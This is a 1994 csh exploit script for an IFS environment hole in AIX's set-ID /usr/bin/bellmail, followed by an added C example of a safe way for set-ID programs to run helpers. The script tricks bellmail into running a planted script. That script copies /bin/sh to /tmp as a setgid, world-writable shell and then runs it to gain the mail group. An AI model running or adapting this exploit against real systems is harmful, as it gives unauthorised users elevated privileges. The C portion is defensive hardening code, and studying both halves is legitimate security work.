
IBM AIX Exploit hole in /usr/bin/bellmail


#!/bin/csh
# Written by A-Flat - June 30, 1994    

# Exploit IFS hole in /usr/bin/bellmail to give us GID=mail.   
# Tested on AIX 3.2.4 

# -r-sr-sr-x   1 root     mail       30340 Jun 18 1993  /usr/bin/bellmail
# sum:  47709    30 /usr/bin/bellmail

cat > usr << EOF
IFS=" "
export IFS
/bin/cp /bin/sh /tmp/.1
/bin/chmod 2777 /tmp/.1
EOF
chmod 755 usr
setenv IFS /
echo " "
echo "At the ? prompt, send mail to a user (m username)"
echo " "
bellmail
unsetenv IFS
rm -f usr
echo " "
echo "Executing SGID mail shell."
/tmp/.1
rm -f /tmp/.1
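
The IFS hole named above belongs to the class of bug where a set-ID program runs a shell command while inheriting the caller's environment. As an added example (not part of the original file, and not IBM's fix for bellmail), this C code shows the defensive pattern for a set-ID program that must run a helper: no shell, absolute path only, fixed environment, privileges dropped first. The names run_helper and clean_env are hypothetical, and it assumes the helper does not need the elevated ID.

```c
#include <stddef.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Fixed environment handed to every helper. Nothing is inherited from
 * the caller, so a hostile IFS or PATH never reaches the child. */
static char *const clean_env[] = {
    "PATH=/usr/bin:/bin",
    "IFS= \t\n",
    NULL
};

/* Run a helper by absolute path, without a shell, with the fixed
 * environment. Returns the helper's exit status, or -1 on failure. */
int run_helper(const char *path, char *const argv[])
{
    int status;
    pid_t pid;

    /* Refuse anything that would be resolved via PATH or the cwd. */
    if (path == NULL || path[0] != '/')
        return -1;

    pid = fork();
    if (pid < 0)
        return -1;

    if (pid == 0) {
        /* Child: give up the set-ID group and user before exec
         * (assumption: the helper needs no elevated ID). Group first. */
        if (setgid(getgid()) != 0 || setuid(getuid()) != 0)
            _exit(127);
        /* execve, not system() or popen(): no shell parses the command,
         * so IFS word splitting never applies to the path. */
        execve(path, argv, clean_env);
        _exit(127);
    }

    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}
```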
